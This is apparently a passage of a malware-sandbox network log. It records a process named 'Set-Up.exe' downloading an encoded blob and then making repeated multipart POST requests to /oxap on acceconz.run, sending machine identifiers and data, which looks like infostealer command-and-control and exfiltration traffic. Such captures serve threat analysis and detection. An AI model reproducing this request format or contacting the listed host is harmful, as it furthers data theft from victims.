2025-04-13 14:21:26 UTC	51	OUT	Data Raw: 75 69 64 3d 61 34 32 31 63 62 39 65 61 63 37 39 33 34 34 35 33 37 63 66 61 63 62 39 63 30 64 31 34 35 36 34 65 31 63 38 62 34 63 63 30 65 26 63 69 64 3d Data Ascii: uid=a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e&cid=
2025-04-13 14:21:26 UTC	788	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 14:21:26 GMT Content-Type: application/octet-stream Content-Length: 34217 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcR0jHyi9oD1sF1TicxBbKf%2BWeKynC%2FPwcHvmx9TIYNuWy9on%2BjyufqbWZUVGV7Uzgzc9vDD9ltAT%2BuHLWpXvqHPQON1aJh9QcvMPPeCKf9q%2F%2F78IcY3Uy6MxTmv7dc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fb9c20299f25b8-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=124382&min_rtt=124365&rtt_var=26244&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=948&delivery_rate=32465&cwnd=252&unsent_bytes=0&cid=0ff000de7dc5afce&ts=664&x=0"
2025-04-13 14:21:26 UTC	581	IN	Data Raw: 3e 4d 82 24 e9 dd f6 c8 07 90 9a a1 3b 53 f1 7b fd 69 c0 e7 88 51 ce 25 36 be 43 1d 63 40 a0 d7 b3 67 b3 da 40 fe fc 27 3a e6 a7 33 bb ee 6e 44 59 f3 9d c6 48 2b fc 21 22 ee ce 8d 34 7e 4a 38 ca 42 3d 87 01 14 35 4e 3a 55 f2 72 9f 21 a0 ec 20 c2 bb 52 69 89 ac 3d 87 8a a6 57 c4 72 3f 14 e8 8d cc 81 74 74 76 8a 17 18 6d e3 77 9f 5c 5d 74 ce f9 7f f2 b5 16 6d e2 2b bc e8 b2 c0 8b d6 b5 10 a5 09 5e 7c d4 68 52 2a 96 79 9f 44 65 d9 84 89 49 9e 36 c0 1d e8 38 1e 2b 5f 29 0f a0 74 5d 74 2d 44 53 7d 5c 43 3d 2b a0 11 6c 1c c1 f9 06 62 6a 52 90 3f 4f b0 a8 78 91 48 1c 1f 81 14 6d 8c 1c 22 4c ad c1 44 34 6a ea f6 4b de 07 71 03 5d d9 a7 4c 06 9d 33 8a 47 ef 4a d4 a0 bc 77 84 6d 52 87 62 3c 89 07 a9 1d 5e 93 6a 33 b9 91 81 ee 51 51 44 40 5e 92 5d 51 70 0e c3 50 25 Data Ascii: >M$;S{iQ%6Cc@g@':3nDYH+!"4~J8B=5N:Ur! Ri=Wr?ttvmw\]tm+^\|hR*yDeI68+_)t]t-DS}\C=+lbjR?OxHm"LD4jKq]L3GJwmRb<^j3QQD@^]QpP%
2025-04-13 14:21:26 UTC	1369	IN	Data Raw: cd 37 c4 52 93 09 29 be 77 85 84 61 8f 98 c3 8c 0f c0 38 1e f0 dd 3a 9b e7 9c de 69 6a 55 67 69 1a 4a f9 96 a0 2d 79 81 2d b9 2e 28 04 35 4d a7 bc 2e 87 53 01 89 32 99 8c 43 74 d2 22 43 6f 46 32 ab e5 81 e8 f8 cb 4d 33 0e 04 86 75 6c b9 e5 06 da e7 b8 d1 8b dd 27 92 29 bd 88 5c 15 2a 14 d9 25 49 28 41 3e d2 02 a0 bf 4b ab 0d a8 bc 45 4d 61 00 07 df d0 c3 e8 a7 4f ec 2c 95 0f 6f 02 31 01 5b ad 1e 48 f0 3a 1a fd 55 73 73 85 1a 81 fc a7 f2 7d cf fe bd bb e9 f3 bc c3 5e 96 25 18 51 0d bb 25 f2 49 a6 06 c9 a4 9e aa e4 1d 2d ca d6 51 d9 a4 09 2c 9f 5c e7 fe ea 69 fc 47 75 a9 8a e3 82 7d 83 31 7c e6 5a 5c 59 aa 27 0b 49 a0 be 36 ef b9 2f 08 1b 06 60 ef 6c b4 d7 8f 05 b9 50 f6 af d7 04 f2 49 ec 9c 18 d9 0a 8c 55 e6 e3 a4 4a 48 d4 65 33 44 36 dd 3c 06 13 44 df fb Data Ascii: 7R)wa8:ijUgiJ-y-.(5M.S2Ct"CoF2M3ul')\*%I(A>KEMaO,o1[H:Uss}^%Q%I-Q,\iGu}1\|Z\Y'I6/`lPIUJHe3D6<D
2025-04-13 14:21:26 UTC	1369	IN	Data Raw: a9 7b ac 5b 87 a1 1a 05 bb b5 e9 01 23 24 92 3a 31 9b 71 45 a7 fa 8d ac 7c 93 3a 9d f2 bd 3d f8 5b f1 d2 d6 ec a1 0f e2 0e 57 62 01 4c 8a c6 76 d8 58 47 7e a7 97 21 5b d1 26 42 bb ed 51 97 d9 31 db 6d 16 eb e2 4d b9 be 68 80 6f e1 de 07 94 31 e1 21 70 67 b7 e5 5e bf 75 10 6f bd 23 33 7f aa 95 ff 06 85 75 1f a3 38 d8 cd 1d 4a eb 28 8f 46 4d 49 d6 35 f3 1e e7 22 1b 37 e2 b4 73 9f 45 98 5a 38 1c 38 f4 fc d6 d9 07 0f c9 7d b6 9d d8 02 1a 54 32 ad d3 ca c8 f2 50 26 b1 a8 7e 7f c0 96 f6 cc 2f da 6b 05 44 17 e3 d8 dc 44 c8 7f 73 bc ef 02 54 43 fd f3 0d 54 71 1f 56 02 89 85 53 93 2d 26 67 51 b0 08 2b 93 15 91 f4 6e 43 aa db b7 92 7f f3 a9 8b 59 41 02 3e 81 55 48 5f fb 53 88 a0 39 be a2 08 e8 ed d2 45 03 30 bc 4a 28 d1 c2 57 73 16 5a 11 31 92 33 54 10 94 fb 24 cf Data Ascii: {[#$:1qE\|:=[WbLvXG~![&BQ1mMho1!pg^uo#3u8J(FMI5"7sEZ88}T2P&~/kDDsTCTqVS-&gQ+nCYA>UH_S9E0J(WsZ13T$
2025-04-13 14:21:26 UTC	1369	IN	Data Raw: e6 61 0a f4 95 80 93 15 98 b5 d3 2c 69 9f 2f 73 bd 83 f6 0d c2 66 f5 c7 10 82 48 47 b3 64 22 9c f0 ab 8c fa 52 2e f7 03 76 7d c4 65 f5 f7 00 f0 a0 98 96 7a 86 b6 54 4a dd 29 6a 2a 8e ce ed 85 e6 78 e9 fd d0 7f 35 db 7b 20 ec 41 de f8 90 59 3a ed a8 5e e6 d3 34 8d cb c0 a1 97 65 7c 8a b2 a3 a6 3c 90 fd 57 68 5e a2 bf 5e eb 77 50 32 2b 66 90 19 23 b5 46 55 c0 0a f9 c6 e3 c3 ce d5 3d 8d 24 0f 1e e9 b2 20 03 5a 8e 47 bd ca eb 36 91 df 15 1b 26 6c 1d 55 64 d5 dc 3e 77 28 54 84 a9 f6 75 e4 9a a2 68 3a a4 af 57 68 b4 e1 34 bd 80 35 40 c9 55 60 80 86 b6 00 a6 84 40 0c 15 c3 17 81 c0 dc c6 34 28 e2 4a 65 77 b0 9f 13 46 0e 5d 1a b6 c2 b8 a3 dd 8f 6c ac 34 d3 3a 19 b0 2f fa fc d3 6e 39 16 f2 fd 29 6e f4 92 78 df c9 18 0a 28 b3 ef 54 6a 4f 7c 0c 1a 78 25 a5 68 4e de Data Ascii: a,i/sfHGd"R.v}ezTJ)j*x5{ AY:^4e\|<Wh^^wP2+f#FU=$ ZG6&lUd>w(Tuh:Wh45@U`@4(JewF]l4:/n9)nx(TjO\|x%hN
2025-04-13 14:21:26 UTC	1369	IN	Data Raw: 5e 1e 3e c9 08 25 2c f1 bf 4a 60 8f 87 e1 2c e3 99 08 66 cd a5 c4 04 b3 28 2d 45 4a 06 67 5f 82 14 ed 99 05 66 f1 a6 c5 2b 28 84 84 5c 49 26 d1 82 62 40 a1 3d 0e df fe d9 25 6e cc 0c 3b c1 06 fb b9 14 71 d6 7d 9e a0 d5 2c e6 06 d8 87 0b 09 2e 59 a9 16 89 0c 77 2e fc 46 c2 4a 31 1c 6c f8 ac 22 fa 97 87 9f 25 0c 3b a5 7b 5e 66 ba c5 17 16 10 f0 4f 21 e4 8f 8a 2f 7a 61 22 3e a4 1f b6 12 db 6e a6 4d c7 b8 eb 0e b1 f2 5d 99 e2 b4 fc f5 73 55 d9 d6 a9 63 ec 21 df 41 fc 7c e2 e9 81 48 04 52 e6 de 71 98 25 1a 4c 63 19 ae 48 10 4f 5b 1d 82 9e dc 5f a2 b1 a0 0e a0 86 a2 1c 9f 58 cc 8f 82 c1 02 d5 01 b4 fa cc e5 f7 17 22 84 bf 31 8e 66 16 9b ad ea e6 d3 ee f5 10 84 90 8f 69 5a 07 1c 31 18 9c 15 f2 8d 7d e3 8a 7e d2 a4 9f d1 a8 59 a1 e1 07 0d f0 36 98 58 57 cc 65 fd Data Ascii: ^>%,J`,f(-EJg_f+(\I&b@=%n;q},.Yw.FJ1l"%;{^fO!/za">nM]sUc!A\|HRq%LcHO[_X"1fiZ1}~Y6XWe
2025-04-13 14:21:26 UTC	1369	IN	Data Raw: ef c3 2c cc 57 16 72 a0 ec 44 ac dc 4b 53 89 ed 68 6d a3 6d b8 ce 6f 1b 20 38 cc f1 26 69 fc 59 e4 1b 23 3c 2f f1 62 8d ec df 78 8e 67 6b d4 33 59 49 9e b1 e8 53 19 bd e2 96 f1 ed 14 bd 81 ac ba a5 86 0c 50 ea b6 55 77 af 72 13 2a 2d 8a 40 7a 7c 94 1e 81 20 31 9f 53 b1 1b 2b c6 88 0b c5 92 72 a8 97 06 b6 1a fc cc e1 95 c7 78 0e 5d 0f b0 9e 58 57 d2 3c b0 74 d5 fb c9 eb 8a 10 b2 4c f6 d1 ec bd ff a9 bb 79 a6 be e8 90 15 1c 73 51 72 52 b1 cd 62 33 3c 0e 2a aa f6 7a e5 d4 4c d0 55 45 bb 74 44 7b dc 20 d5 f6 ee 35 df c6 d2 92 38 9d b1 dc a0 cd 21 60 7c dc 21 8e b6 23 09 82 62 36 5c dc ad 59 7a a1 17 40 3e 81 b5 e9 84 c0 31 7e 5f 0a b0 0d 0a c0 a8 52 32 11 ed 90 19 8e 2a 64 ca fb 2f 2e 69 e9 68 19 eb f7 9e c1 c2 ae 13 31 d7 43 d2 c7 d3 a1 15 06 e0 2a b1 ba f4 Data Ascii: ,WrDKShmmo 8&iY#</bxgk3YISPUwr-@z\| 1S+rx]XW<tLysQrRb3<zLUEtD{ 58!`\|!#b6\Yz@>1~_R2d/.ih1C
2025-04-13 14:21:26 UTC	1369	IN	Data Raw: e7 b9 57 c5 ee 98 bd b0 5b 0a c7 79 7f 47 54 b8 5d 96 b8 a7 ca 5c c2 84 8b d0 e6 ff d3 b7 da 79 55 43 58 44 cd 25 ec 81 80 d7 96 e5 b9 86 41 b3 34 a0 ac 81 55 50 3c 9c 2c 66 3a f4 f2 06 e0 bb 81 15 04 b8 08 59 91 0f 63 04 a7 54 01 35 cb c5 3e 7e 32 29 3b 3b 7d 7a cf 53 4c 30 72 4b 21 45 3d ea 4b 89 3c 41 04 b6 fc e2 32 dd 58 d9 cc 69 96 7a a6 f3 b8 92 b0 f5 7b da 5b f8 9c df aa 7b 0e cc d3 c3 3f cb 93 3d d3 08 fd d6 3f 0b f0 b2 da e3 10 55 33 03 4e 50 ff 3d e2 38 99 10 ee 43 55 27 46 81 be 6d f4 a8 e8 4e 78 33 e8 0a 62 47 a2 7f 79 83 ce 5b ad 21 a4 c5 bf 77 1a f7 23 57 ca 5e e2 92 39 99 6e a5 c6 f5 6e 79 88 50 f8 9b 4e 6f 8c 6a 24 69 02 75 06 39 ca 45 06 f0 66 e4 a9 3f db fd 80 b4 d8 8a d0 26 c0 9f 04 57 6b ee f1 33 68 f9 5b 0a fd 28 d5 ac 29 2e 58 13 fd Data Ascii: W[yGT]\yUCXD%A4UP<,f:YcT5>~2);;}zSL0rK!E=K<A2Xiz{[{?=?U3NP=8CU'FmNx3bGy[!w#W^9nnyPNoj$iu9Ef?&Wk3h[().X
2025-04-13 14:21:26 UTC	1369	IN	Data Raw: eb 74 17 9e c9 a8 8b 94 83 43 12 a6 f6 d9 bf 02 ef de 48 a1 1c c0 69 c9 2c 26 74 81 2f dc f4 3c 02 63 5e 3e ae 61 f8 15 24 20 ad 70 78 11 4c c9 b7 be 0b 40 e4 30 9f 39 4c 8f b1 ff 2e 81 2f ba c0 c7 3a 71 46 27 28 75 d5 f1 50 99 2f e0 56 66 1f 8a 85 e4 6c 6a b0 80 b0 da 44 33 d6 ad 69 c8 9e 7a 03 10 cf 84 62 5b 8c 14 ce 25 7c 85 60 81 67 4e 8c 87 15 66 53 93 4c 44 89 ff de 3f 89 d7 d8 22 a0 07 11 5d 4f 46 1b 0c 1f 7a 93 c3 9c 10 be 19 05 12 f8 d8 05 51 36 21 cd fc fe be 9c c7 76 03 99 bf 3e 40 d0 13 ca 87 13 48 78 dd e4 b0 74 0c 93 03 23 28 a1 15 e4 61 29 2a 54 cd b0 2e 44 05 08 c3 d6 1d 25 08 d6 d6 a5 4a 28 97 48 94 c4 e3 44 4b 57 d6 17 cd fa a6 9c bf 5b 7d 34 4f 58 40 ee a4 ff c5 30 de 2b 04 2a 46 dc 3e e6 6f 88 5e 8d 0e e9 6d f9 1d d4 54 7f 00 2e f1 bc Data Ascii: tCHi,&t/<c^>a$ pxL@09L./:qF'(uP/VfljD3izb[%\|`gNfSLD?"]OFzQ6!v>@Hxt#(a)T.D%J(HDKW[}4OX@0+F>o^mT.
2025-04-13 14:21:26 UTC	755	IN	Data Raw: 0e 92 cc e1 9f b3 42 dc 37 ec 2f 9b 76 9d de 4e 96 c0 d3 8c a5 6e 23 ad 65 f4 71 cc 8f ff b4 a3 ad e1 20 a3 08 08 0d 47 77 97 00 fb fa 18 f0 59 d9 10 49 20 fe e8 88 35 de 48 63 66 30 f5 90 33 76 d9 4b 39 0e ba 2f dd df 54 b2 b9 31 6e 27 3d 01 3d b5 91 22 1b 5d 66 ef 18 12 dd 9c e2 7b ac 1b 8d 71 8a e8 45 01 49 34 0d 6b fc e4 cf db 1d 15 b6 c4 14 fe cc 4b c8 19 fa f1 a3 e8 e3 5d 28 6e 50 28 b3 f1 76 7f 86 ad 69 41 31 1e 0d 7a 3b cb ab ac 1f fb 87 76 1a 48 d6 23 dd 55 ee b8 94 6e 6f 71 f4 0a ed 1d 4e d2 d9 e8 dc 01 90 b7 17 10 de c9 ad e9 ee 3c 4d e4 e8 7b 10 39 d8 27 f3 61 bc 7d 55 85 8f ce e2 9a d6 77 19 64 af 24 a8 dc da 22 b5 c5 f6 1f f7 db 8c d1 79 ab 3e df 6e f9 b2 5f c3 1c 19 99 55 b9 48 d0 fb 28 b0 bf 66 ce ad 74 20 d7 c6 b6 d5 3e 8e c3 62 87 21 f5 Data Ascii: B7/vNn#eq GwYI 5Hcf03vK9/T1n'=="]f{qEI4kK](nP(viA1z;vH#UnoqN<M{9'a}Uwd$"y>n_UH(ft >b!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49699	172.67.131.70	443	7936	C:\Users\user\Desktop\Set-Up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 14:21:28 UTC	277	OUT	POST /oxap HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3Mb3hKUEt0zIv86h User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 14913 Host: acceconz.run
2025-04-13 14:21:28 UTC	14913	OUT	Data Raw: 2d 2d 33 4d 62 33 68 4b 55 45 74 30 7a 49 76 38 36 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 34 32 31 63 62 39 65 61 63 37 39 33 34 34 35 33 37 63 66 61 63 62 39 63 30 64 31 34 35 36 34 65 31 63 38 62 34 63 63 30 65 0d 0a 2d 2d 33 4d 62 33 68 4b 55 45 74 30 7a 49 76 38 36 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 4d 62 33 68 4b 55 45 74 30 7a 49 76 38 36 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 32 39 44 33 37 41 36 Data Ascii: --3Mb3hKUEt0zIv86hContent-Disposition: form-data; name="uid"a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e--3Mb3hKUEt0zIv86hContent-Disposition: form-data; name="pid"2--3Mb3hKUEt0zIv86hContent-Disposition: form-data; name="hwid"B529D37A6
2025-04-13 14:21:28 UTC	810	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 14:21:28 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jgYQDQngId%2Fg8gzv6qvdJX19xBXqjpY%2BZS3nNDKcWkcAE%2FgGI1BtbB4VhY3p1%2B%2Bl0G6vGFCwcPFb2ttjY0CEJ5ThwbGvWS7RN8wEbJaLCMBmBzR1zIzGqHU3Vhww2xs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fb9c2a8d39ae89-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=112699&min_rtt=112584&rtt_var=23820&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2825&recv_bytes=15848&delivery_rate=35842&cwnd=252&unsent_bytes=0&cid=689284891f3802e3&ts=869&x=0"
2025-04-13 14:21:28 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
2025-04-13 14:21:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49700	172.67.131.70	443	7936	C:\Users\user\Desktop\Set-Up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 14:21:29 UTC	271	OUT	POST /oxap HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CQvUMInU4v User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 15032 Host: acceconz.run
2025-04-13 14:21:29 UTC	15032	OUT	Data Raw: 2d 2d 43 51 76 55 4d 49 6e 55 34 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 34 32 31 63 62 39 65 61 63 37 39 33 34 34 35 33 37 63 66 61 63 62 39 63 30 64 31 34 35 36 34 65 31 63 38 62 34 63 63 30 65 0d 0a 2d 2d 43 51 76 55 4d 49 6e 55 34 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 51 76 55 4d 49 6e 55 34 76 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 32 39 44 33 37 41 36 31 31 39 41 37 38 46 38 44 30 37 46 44 44 32 45 31 32 Data Ascii: --CQvUMInU4vContent-Disposition: form-data; name="uid"a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e--CQvUMInU4vContent-Disposition: form-data; name="pid"2--CQvUMInU4vContent-Disposition: form-data; name="hwid"B529D37A6119A78F8D07FDD2E12
2025-04-13 14:21:30 UTC	804	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 14:21:30 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FQRgwy5zjCc4d%2FClfrHEPgZjBZ68IfLC8ZDGJidOE48fXrayPHChTjLv2%2B0ZBx6NgaSS0rBKnSAoJTaqRODwFDQgYaKcdZMVVgyCvfdNPrQSBU1x77ajl8OmJvj9yOI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fb9c33ea0d82b6-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=121636&min_rtt=121510&rtt_var=25734&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2827&recv_bytes=15961&delivery_rate=33211&cwnd=252&unsent_bytes=0&cid=f4ee3e4784858309&ts=730&x=0"
2025-04-13 14:21:30 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
2025-04-13 14:21:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49701	172.67.131.70	443	7936	C:\Users\user\Desktop\Set-Up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 14:21:30 UTC	278	OUT	POST /oxap HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=vdIMO48pGI65MvY05 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 20556 Host: acceconz.run
2025-04-13 14:21:30 UTC	15331	OUT	Data Raw: 2d 2d 76 64 49 4d 4f 34 38 70 47 49 36 35 4d 76 59 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 34 32 31 63 62 39 65 61 63 37 39 33 34 34 35 33 37 63 66 61 63 62 39 63 30 64 31 34 35 36 34 65 31 63 38 62 34 63 63 30 65 0d 0a 2d 2d 76 64 49 4d 4f 34 38 70 47 49 36 35 4d 76 59 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 76 64 49 4d 4f 34 38 70 47 49 36 35 4d 76 59 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 32 39 44 33 Data Ascii: --vdIMO48pGI65MvY05Content-Disposition: form-data; name="uid"a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e--vdIMO48pGI65MvY05Content-Disposition: form-data; name="pid"3--vdIMO48pGI65MvY05Content-Disposition: form-data; name="hwid"B529D3
2025-04-13 14:21:30 UTC	5225	OUT	Data Raw: e8 8d 06 a6 d5 10 5e 2f a7 70 3e d5 c8 ad fb ee 74 b3 0a e5 eb e1 ce d2 21 8c cc 0d 2a be 16 b0 47 86 56 fc 3e f2 78 6f d5 42 ec 65 12 b3 cc 1b 18 c4 2b 55 e7 a9 b1 91 43 e1 a5 8b 0d 95 6a f6 4f 44 5f 00 d4 8d 0d c6 9a 8e f9 7b bf 7d 34 e7 b7 0d 9a 3f 35 11 8f 03 22 f3 bc 40 b1 91 7a 4b dc 10 67 83 26 ed 68 6d cf 81 1b 65 12 62 1a 6d 62 81 88 27 88 6b a1 e0 35 b2 08 ac 22 64 e4 05 cb fc 2c 1e 29 eb 69 40 01 b2 3a a2 3b 96 db 24 f8 3e d9 40 2d d1 88 80 8c 5f f7 56 c4 2f c2 9e 96 97 6d bb d8 61 f4 ba 8c 06 c9 b6 01 08 81 65 e5 a2 dd 19 cd 59 ff 2d d2 1c 9e 8c c9 65 ce 31 49 0e 86 87 ad 51 f3 1b 9e 30 cb c3 a4 8a 94 ed d9 19 5e 4e 14 e9 c5 0c 70 b0 62 05 76 dd e1 e7 ee 66 e2 5f e1 ee c5 40 a4 62 78 ad 37 dd d5 24 ad 74 44 26 fb 01 3b ee 4f cc b6 22 6e e6 98 Data Ascii: ^/p>t!*GV>xoBe+UCjOD_{}4?5"@zKg&hmebmb'k5"d,)i@:;$>@-_V/maeY-e1IQ0^Npbvf_@bx7$tD&;O"n
2025-04-13 14:21:31 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 14:21:31 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrGZKF5EE05NEAsankFQLiqxRdAEZSo0ytMgReRMH560ptXvQGnFH2bFv5rUyMi09sSOCAiJvru6LpDJWYNcRpIBro3GMfusqpXI9XEbIbbTed29vRdc%2F%2BFSwj%2FkZrI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fb9c3bf8bec430-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=113619&min_rtt=112854&rtt_var=24606&sent=15&recv=23&lost=0&retrans=0&sent_bytes=2825&recv_bytes=21514&delivery_rate=35777&cwnd=252&unsent_bytes=0&cid=e409897ad3035b70&ts=761&x=0"
2025-04-13 14:21:31 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
2025-04-13 14:21:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49702	172.67.131.70	443	7936	C:\Users\user\Desktop\Set-Up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 14:21:32 UTC	277	OUT	POST /oxap HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=p2GWAU9tdbOEbIUzb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 2547 Host: acceconz.run
2025-04-13 14:21:32 UTC	2547	OUT	Data Raw: 2d 2d 70 32 47 57 41 55 39 74 64 62 4f 45 62 49 55 7a 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 34 32 31 63 62 39 65 61 63 37 39 33 34 34 35 33 37 63 66 61 63 62 39 63 30 64 31 34 35 36 34 65 31 63 38 62 34 63 63 30 65 0d 0a 2d 2d 70 32 47 57 41 55 39 74 64 62 4f 45 62 49 55 7a 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 70 32 47 57 41 55 39 74 64 62 4f 45 62 49 55 7a 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 35 32 39 44 33 Data Ascii: --p2GWAU9tdbOEbIUzbContent-Disposition: form-data; name="uid"a421cb9eac79344537cfacb9c0d14564e1c8b4cc0e--p2GWAU9tdbOEbIUzbContent-Disposition: form-data; name="pid"1--p2GWAU9tdbOEbIUzbContent-Disposition: form-data; name="hwid"B529D3
